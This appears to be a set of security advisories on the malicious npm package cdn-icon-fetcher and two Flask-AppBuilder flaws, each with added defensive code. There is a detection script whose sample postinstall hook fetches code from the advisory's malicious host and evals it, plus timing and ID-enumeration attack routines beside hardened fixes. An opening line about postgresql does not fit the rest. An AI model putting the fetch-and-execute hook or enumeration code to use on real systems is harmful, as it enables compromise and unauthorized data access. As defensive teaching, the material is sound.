by Snyk Security Researchers
Upgrade postgresql to version 13.19, 14.16, 15.11, 16.7, 17.3 or higher.
cdn-icon-fetcher is a malicious package.
Affected versions of this package are vulnerable to Embedded Malicious Code. Once the package is installed and executed, it downloads a JavaScript file from a cdn-static-icons.vercel.app URL that presents itself as an image-hosting site. When the request carries a specific custom header, as described in the library, the response is instead a JavaScript first-stage loader. That loader downloads a .npl file, which is a second-stage loader written in Python, and that stage in turn fetches and executes a third Python file, the actual payload, which is referenced from a specific Medium article.
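The practical question this advisory raises is how to catch an install-time downloader before it runs. The script below is an added example, not code from the advisory or from the package: it parses an npm package.json for lifecycle hooks, then scans the hooked script for the combination described above (a remote fetch, a custom request header, and dynamic execution of the response). The package.json, the setup.js source and the X-Asset-Key header name are all constructed for the example; only the cdn-static-icons.vercel.app host comes from the advisory, and the real package's code is not reproduced here.

```python
"""Static triage of an npm package for install-time download-and-execute behaviour."""
import json
import re

# npm runs these scripts automatically during `npm install`.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Constructed example package manifest (not the real cdn-icon-fetcher manifest).
PACKAGE_JSON = json.dumps({
    "name": "example-icon-fetcher",
    "version": "1.0.0",
    "scripts": {"postinstall": "node setup.js"},
})

# Constructed hooked script modelled on the behaviour the advisory describes;
# the header name "X-Asset-Key" is an assumption for illustration only.
SETUP_JS = r'''
const https = require("https");
const { execSync } = require("child_process");
const opts = { headers: { "X-Asset-Key": "stage1" } };
https.get("https://cdn-static-icons.vercel.app/icon.png", opts, (res) => {
  let body = "";
  res.on("data", (c) => (body += c));
  res.on("end", () => eval(body));   // response is executed, not displayed
});
'''

# A benign package for comparison: same hook, but no network or eval.
BENIGN_PACKAGE_JSON = json.dumps({"name": "ok-pkg", "scripts": {"postinstall": "node build.js"}})
BENIGN_BUILD_JS = 'const fs = require("fs"); fs.writeFileSync("dist/index.js", "module.exports = {};");'

PATTERNS = {
    "remote_fetch": re.compile(r"https?://([A-Za-z0-9.-]+)"),
    "custom_header": re.compile(r"headers\s*:\s*\{"),
    "dynamic_eval": re.compile(r"\b(?:eval|new Function)\s*\("),
    "child_process": re.compile(r"require\(\s*['\"]child_process['\"]\s*\)"),
}


def find_lifecycle_hooks(package_json: str) -> dict:
    """Return only the scripts npm will run unattended during installation."""
    scripts = json.loads(package_json).get("scripts", {})
    return {k: v for k, v in scripts.items() if k in LIFECYCLE_HOOKS}


def scan_source(source: str) -> dict:
    """Map each indicator to its hits: hostnames for fetches, counts otherwise."""
    hits = {}
    for name, rx in PATTERNS.items():
        found = rx.findall(source)
        if found:
            hits[name] = sorted(set(found)) if name == "remote_fetch" else len(found)
    return hits


def triage(package_json: str, sources: dict) -> dict:
    """Flag a package whose install hook fetches remote content and executes it."""
    hooks = find_lifecycle_hooks(package_json)
    hits = {}
    for cmd in hooks.values():
        for fname, src in sources.items():
            if fname in cmd:                      # the hook invokes this file
                for k, v in scan_source(src).items():
                    hits[k] = v
    executes = "dynamic_eval" in hits or "child_process" in hits
    verdict = "suspicious" if hooks and "remote_fetch" in hits and executes else "clean"
    return {"hooks": hooks, "hits": hits, "verdict": verdict}


if __name__ == "__main__":
    print(triage(PACKAGE_JSON, {"setup.js": SETUP_JS}))
    print(triage(BENIGN_PACKAGE_JSON, {"build.js": BENIGN_BUILD_JS}))
```

This is a coarse first pass, not a replacement for sandboxed dynamic analysis: it only sees the first stage, so a loader that hides its fetch behind obfuscation will slip past the regexes. It is still cheap enough to run over every package in a lockfile, and `npm install --ignore-scripts` in CI removes the lifecycle-hook vector entirely.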
Flask-AppBuilder is a simple and rapid application development framework built on top of Flask. It includes detailed security, automatic CRUD generation for your models, Google Charts integration and much more.
Affected versions of this package are vulnerable to Information Exposure through observable response discrepancies. An unauthenticated attacker can determine whether a username exists by measuring server response times during login attempts, because requests for existing and non-existing accounts take measurably different amounts of time to answer.
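The advisory does not spell out where the timing difference comes from, so the following is an added example, not Flask-AppBuilder's code: it assumes the usual cause of this bug class, a login routine that returns early when the username is unknown and only runs the expensive password hash for accounts that exist. The user store, the PBKDF2 parameters, the dummy credential and the hash counter are all constructed for the example. The hardened variant does the same hashing work on every path and only then folds in whether the user existed.

```python
"""Login timing side channel: early-return variant beside a constant-work variant."""
import hashlib
import hmac
import os
import time
from statistics import median

ITERATIONS = 50_000          # PBKDF2 cost; large enough that skipping it is measurable
STATS = {"hashes": 0}        # counts hash evaluations so the behaviour can be checked


def hash_password(password: str, salt: bytes) -> bytes:
    STATS["hashes"] += 1
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)


# Constructed in-memory user store: username -> (salt, hash). Only "alice" exists.
_ALICE_SALT = os.urandom(16)
USERS = {"alice": (_ALICE_SALT, hash_password("correct horse", _ALICE_SALT))}

# A throwaway credential that unknown usernames are checked against, so the
# server performs identical work whether or not the account exists.
_DUMMY_SALT = os.urandom(16)
_DUMMY_HASH = hash_password(os.urandom(16).hex(), _DUMMY_SALT)


def login_vulnerable(username: str, password: str) -> bool:
    user = USERS.get(username)
    if user is None:
        return False         # returns before hashing: the fast path reveals non-existence
    salt, stored = user
    return hmac.compare_digest(hash_password(password, salt), stored)


def login_hardened(username: str, password: str) -> bool:
    user = USERS.get(username)
    salt, stored = user if user is not None else (_DUMMY_SALT, _DUMMY_HASH)
    match = hmac.compare_digest(hash_password(password, salt), stored)
    return match and user is not None   # existence only influences the final decision


def time_login(login, username: str, password: str, rounds: int = 5) -> float:
    """Median wall-clock seconds for one login attempt, as an attacker would measure it."""
    samples = []
    for _ in range(rounds):
        t0 = time.perf_counter()
        login(username, password)
        samples.append(time.perf_counter() - t0)
    return median(samples)


if __name__ == "__main__":
    for name, fn in (("vulnerable", login_vulnerable), ("hardened", login_hardened)):
        known = time_login(fn, "alice", "wrong password")
        unknown = time_login(fn, "nobody", "wrong password")
        print(f"{name}: existing user {known * 1e3:.1f} ms, unknown user {unknown * 1e3:.1f} ms")
```

Run it and the vulnerable function answers an unknown username in microseconds while an existing one costs a full PBKDF2 evaluation; the hardened function costs the same on both paths. Equal work is the fix here, not jitter or a fixed sleep: added noise only raises the number of samples an attacker needs, whereas removing the work difference removes the signal.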
Affected versions of this package are vulnerable to Improper Privilege Management in a REST interface. An attacker who knows a resource's ID can retrieve that resource without being authorized to access it.
Note: This is only exploitable by a registered (authenticated) user.
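The pattern the advisory describes is a missing object-level authorization check: the endpoint verifies that the caller is logged in but not that the caller may see the specific record. The code below is an added example, not Flask-AppBuilder's REST implementation; the record store, the User and Record types and the admin role are constructed for illustration. It shows a lookup that trusts the ID beside one that checks ownership, and an ID sweep that makes the difference visible.

```python
"""Object-level authorization on a REST-style get-by-ID lookup."""
from dataclasses import dataclass


@dataclass(frozen=True)
class User:
    name: str
    role: str            # "user" or "admin" (constructed roles for the example)


@dataclass(frozen=True)
class Record:
    id: int
    owner: str
    body: str


class NotFound(Exception):
    pass


# Constructed store: sequential IDs, owned by different users.
RECORDS = {
    1: Record(1, "alice", "alice's invoice"),
    2: Record(2, "bob", "bob's invoice"),
    3: Record(3, "alice", "alice's contract"),
}


def get_record_vulnerable(current_user: User, record_id: int) -> Record:
    """Authenticated, but any logged-in user can read any record they can guess the ID of."""
    rec = RECORDS.get(record_id)
    if rec is None:
        raise NotFound(record_id)
    return rec


def get_record_hardened(current_user: User, record_id: int) -> Record:
    """Deny unless the caller owns the record or is an admin.

    Missing and unauthorized records raise the same error, so a sweep of IDs
    cannot distinguish 'does not exist' from 'exists but is not yours'.
    """
    rec = RECORDS.get(record_id)
    authorized = rec is not None and (rec.owner == current_user.name or current_user.role == "admin")
    if not authorized:
        raise NotFound(record_id)
    return rec


def enumerate_ids(lookup, current_user: User, id_range) -> list:
    """Simulates a registered attacker sweeping IDs and keeping whatever comes back."""
    found = []
    for rid in id_range:
        try:
            found.append(lookup(current_user, rid).id)
        except NotFound:
            continue
    return found


if __name__ == "__main__":
    bob = User("bob", "user")
    print("vulnerable:", enumerate_ids(get_record_vulnerable, bob, range(1, 6)))
    print("hardened:  ", enumerate_ids(get_record_hardened, bob, range(1, 6)))
```

The authorization decision belongs in the data-access layer (here, inside the lookup), not in the route handler: that way every endpoint that fetches a record, including ones added later, inherits the check instead of re-implementing it.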